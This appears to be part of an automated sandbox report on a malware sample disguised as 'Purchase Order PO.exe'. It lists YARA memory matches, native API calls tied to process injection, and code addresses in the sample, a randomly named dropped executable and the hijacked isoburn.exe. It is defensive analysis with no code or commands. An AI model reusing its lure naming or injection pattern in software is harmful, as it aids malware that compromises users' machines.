                Source: Yara matchFile source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: initial sampleStatic PE information: Filename: Purchase Order PO.exe
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0042C663 NtClose,2_2_0042C663
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2B60 NtClose,LdrInitializeThunk,2_2_01AD2B60
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01AD2DF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01AD2C70
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD35C0 NtCreateMutant,LdrInitializeThunk,2_2_01AD35C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD4340 NtSetContextThread,2_2_01AD4340
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD4650 NtSuspendThread,2_2_01AD4650
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2BA0 NtEnumerateValueKey,2_2_01AD2BA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2B80 NtQueryInformationFile,2_2_01AD2B80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2BE0 NtQueryValueKey,2_2_01AD2BE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2BF0 NtAllocateVirtualMemory,2_2_01AD2BF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2AB0 NtWaitForSingleObject,2_2_01AD2AB0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2AF0 NtWriteFile,2_2_01AD2AF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2AD0 NtReadFile,2_2_01AD2AD0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2DB0 NtEnumerateKey,2_2_01AD2DB0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2DD0 NtDelayExecution,2_2_01AD2DD0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2D30 NtUnmapViewOfSection,2_2_01AD2D30
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2D00 NtSetInformationFile,2_2_01AD2D00
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2D10 NtMapViewOfSection,2_2_01AD2D10
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2CA0 NtQueryInformationToken,2_2_01AD2CA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2CF0 NtOpenProcess,2_2_01AD2CF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2CC0 NtQueryVirtualMemory,2_2_01AD2CC0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2C00 NtQueryInformationProcess,2_2_01AD2C00
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2C60 NtCreateKey,2_2_01AD2C60
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2FA0 NtQuerySection,2_2_01AD2FA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2FB0 NtResumeThread,2_2_01AD2FB0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2F90 NtProtectVirtualMemory,2_2_01AD2F90
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2FE0 NtCreateFile,2_2_01AD2FE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2F30 NtCreateSection,2_2_01AD2F30
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2F60 NtCreateProcessEx,2_2_01AD2F60
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2EA0 NtAdjustPrivilegesToken,2_2_01AD2EA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2E80 NtReadVirtualMemory,2_2_01AD2E80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2EE0 NtQueueApcThread,2_2_01AD2EE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2E30 NtWriteVirtualMemory,2_2_01AD2E30
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD3090 NtSetValueKey,2_2_01AD3090
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD3010 NtOpenDirectoryObject,2_2_01AD3010
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD39B0 NtGetContextThread,2_2_01AD39B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD3D10 NtOpenProcessToken,2_2_01AD3D10
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD3D70 NtOpenThread,2_2_01AD3D70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05044650 NtSuspendThread,LdrInitializeThunk,7_2_05044650
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05044340 NtSetContextThread,LdrInitializeThunk,7_2_05044340
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042D10 NtMapViewOfSection,LdrInitializeThunk,7_2_05042D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_05042D30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042DD0 NtDelayExecution,LdrInitializeThunk,7_2_05042DD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_05042DF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042C60 NtCreateKey,LdrInitializeThunk,7_2_05042C60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_05042C70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_05042CA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042F30 NtCreateSection,LdrInitializeThunk,7_2_05042F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042FB0 NtResumeThread,LdrInitializeThunk,7_2_05042FB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042FE0 NtCreateFile,LdrInitializeThunk,7_2_05042FE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_05042E80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042EE0 NtQueueApcThread,LdrInitializeThunk,7_2_05042EE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042B60 NtClose,LdrInitializeThunk,7_2_05042B60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_05042BA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042BE0 NtQueryValueKey,LdrInitializeThunk,7_2_05042BE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_05042BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042AD0 NtReadFile,LdrInitializeThunk,7_2_05042AD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042AF0 NtWriteFile,LdrInitializeThunk,7_2_05042AF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050435C0 NtCreateMutant,LdrInitializeThunk,7_2_050435C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050439B0 NtGetContextThread,LdrInitializeThunk,7_2_050439B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042D00 NtSetInformationFile,7_2_05042D00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042DB0 NtEnumerateKey,7_2_05042DB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042C00 NtQueryInformationProcess,7_2_05042C00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042CC0 NtQueryVirtualMemory,7_2_05042CC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042CF0 NtOpenProcess,7_2_05042CF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042F60 NtCreateProcessEx,7_2_05042F60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042F90 NtProtectVirtualMemory,7_2_05042F90
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042FA0 NtQuerySection,7_2_05042FA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042E30 NtWriteVirtualMemory,7_2_05042E30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042EA0 NtAdjustPrivilegesToken,7_2_05042EA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042B80 NtQueryInformationFile,7_2_05042B80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05042AB0 NtWaitForSingleObject,7_2_05042AB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05043010 NtOpenDirectoryObject,7_2_05043010
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05043090 NtSetValueKey,7_2_05043090
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05043D10 NtOpenProcessToken,7_2_05043D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05043D70 NtOpenThread,7_2_05043D70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D39210 NtReadFile,7_2_02D39210
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D393A0 NtClose,7_2_02D393A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D39300 NtDeleteFile,7_2_02D39300
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D390A0 NtCreateFile,7_2_02D390A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D39510 NtAllocateVirtualMemory,7_2_02D39510
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0114DF940_2_0114DF94
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DF85000_2_05DF8500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DF54D80_2_05DF54D8
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DF21060_2_05DF2106
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DFB4D00_2_05DFB4D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DF336A0_2_05DF336A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DFE2E50_2_05DFE2E5
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DFE2880_2_05DFE288
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DFE2790_2_05DFE279
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DF2C380_2_05DF2C38
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0746A0200_2_0746A020
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_07464D080_2_07464D08
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_074651400_2_07465140
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_074648D00_2_074648D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_074668800_2_07466880
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004185832_2_00418583
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004030402_2_00403040
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004010002_2_00401000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0040E1082_2_0040E108
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0040E1132_2_0040E113
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004012702_2_00401270
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004022A52_2_004022A5
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004022B02_2_004022B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00402B212_2_00402B21
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00402B302_2_00402B30
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0040242E2_2_0040242E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004024302_2_00402430
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0042ECA32_2_0042ECA3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0040FDAB2_2_0040FDAB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0040FDB32_2_0040FDB3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004027102_2_00402710
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0040DFC32_2_0040DFC3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0040FFD32_2_0040FFD3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004167932_2_00416793
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B601AA2_2_01B601AA
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B581CC2_2_01B581CC
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A901002_2_01A90100
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3A1182_2_01B3A118
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B281582_2_01B28158
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B320002_2_01B32000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B603E62_2_01B603E6
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE3F02_2_01AAE3F0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5A3522_2_01B5A352
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B202C02_2_01B202C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B402742_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B605912_2_01B60591
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA05352_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B4E4F62_2_01B4E4F6
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B524462_2_01B52446
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9C7C02_2_01A9C7C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA07702_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC47502_2_01AC4750
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABC6E02_2_01ABC6E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A02_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B6A9A62_2_01B6A9A6
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB69622_2_01AB6962
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A868B82_2_01A868B8
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE8F02_2_01ACE8F0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA28402_2_01AA2840
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAA8402_2_01AAA840
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B56BD72_2_01B56BD7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5AB402_2_01B5AB40
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA802_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB8DBF2_2_01AB8DBF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9ADE02_2_01A9ADE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAAD002_2_01AAAD00
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3CD1F2_2_01B3CD1F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40CB52_2_01B40CB5
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90CF22_2_01A90CF2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0C002_2_01AA0C00
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1EFA02_2_01B1EFA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A92FC82_2_01A92FC8
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B42F302_2_01B42F30
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AE2F282_2_01AE2F28
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC0F302_2_01AC0F30
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B14F402_2_01B14F40
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5CE932_2_01B5CE93
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB2E902_2_01AB2E90
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5EEDB2_2_01B5EEDB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5EE262_2_01B5EE26
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0E592_2_01AA0E59
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAB1B02_2_01AAB1B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD516C2_2_01AD516C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8F1722_2_01A8F172
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B6B16B2_2_01B6B16B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5F0E02_2_01B5F0E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B570E92_2_01B570E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA70C02_2_01AA70C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B4F0CC2_2_01B4F0CC
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AE739A2_2_01AE739A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5132D2_2_01B5132D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8D34C2_2_01A8D34C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA52A02_2_01AA52A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B412ED2_2_01B412ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABD2F02_2_01ABD2F0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABB2C02_2_01ABB2C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3D5B02_2_01B3D5B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B575712_2_01B57571
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5F43F2_2_01B5F43F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A914602_2_01A91460
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5F7B02_2_01B5F7B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B516CC2_2_01B516CC
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B359102_2_01B35910
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA99502_2_01AA9950
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABB9502_2_01ABB950
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA38E02_2_01AA38E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0D8002_2_01B0D800
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABFB802_2_01ABFB80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B15BF02_2_01B15BF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ADDBF92_2_01ADDBF9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5FB762_2_01B5FB76
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AE5AA02_2_01AE5AA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B41AA32_2_01B41AA3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3DAAC2_2_01B3DAAC
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B4DAC62_2_01B4DAC6
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B13A6C2_2_01B13A6C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B57A462_2_01B57A46
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5FA492_2_01B5FA49
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABFDC02_2_01ABFDC0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B57D732_2_01B57D73
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA3D402_2_01AA3D40
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B51D5A2_2_01B51D5A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5FCF22_2_01B5FCF2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B19C322_2_01B19C32
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5FFB12_2_01B5FFB1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA1F922_2_01AA1F92
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5FF092_2_01B5FF09
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA9EB02_2_01AA9EB0
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_0329634D6_2_0329634D
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_032ACB426_2_032ACB42
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_0328BFA76_2_0328BFA7
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_0328BFB26_2_0328BFB2
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_032946326_2_03294632
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_0328BE626_2_0328BE62
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_0328DE726_2_0328DE72
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_0328DC4A6_2_0328DC4A
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_0328DC526_2_0328DC52
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050105357_2_05010535
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050D05917_2_050D0591
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050B44207_2_050B4420
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C24467_2_050C2446
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050BE4F67_2_050BE4F6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050347507_2_05034750
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050107707_2_05010770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0500C7C07_2_0500C7C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0502C6E07_2_0502C6E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050001007_2_05000100
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050AA1187_2_050AA118
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050981587_2_05098158
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050D01AA7_2_050D01AA
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C41A27_2_050C41A2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C81CC7_2_050C81CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050A20007_2_050A2000
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CA3527_2_050CA352
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050D03E67_2_050D03E6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0501E3F07_2_0501E3F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050B02747_2_050B0274
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050902C07_2_050902C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0501AD007_2_0501AD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050ACD1F7_2_050ACD1F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05028DBF7_2_05028DBF
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0500ADE07_2_0500ADE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05010C007_2_05010C00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050B0CB57_2_050B0CB5
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05000CF27_2_05000CF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05052F287_2_05052F28
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05030F307_2_05030F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050B2F307_2_050B2F30
